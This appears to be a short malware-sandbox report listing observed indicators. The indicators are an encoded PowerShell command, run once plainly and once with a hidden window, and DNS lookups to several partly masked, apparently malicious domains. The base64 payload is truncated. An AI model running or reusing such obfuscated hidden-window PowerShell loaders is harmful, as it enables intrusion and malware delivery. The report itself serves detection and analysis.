Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAAUABpAGsAcQBoAHAAawBzAGIAaABhACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAEwAbABlAGwAaAB3AHIAdwBiAHIAYgAgACMAPgAgACQAVgBhAHEAZgBqAHoAawBkAHoAeABrAHcAZg...
- DNS ASK an##l.ac.nz
- DNS ASK co###ket.info
- DNS ASK al######.000webhostapp.com
- DNS ASK ho####cietepromo.ca
- DNS ASK au####orsale.co.nz
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAAUABpAGsAcQBoAHAAawBzAGIAaABhACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAEwAbABlAGwAaAB3AHIAdwBiAHIAYgAgACMAPgAgACQAVgBhAHEAZgBqAHoAawBkAHoAeABrAHcAZg...' (with hidden window)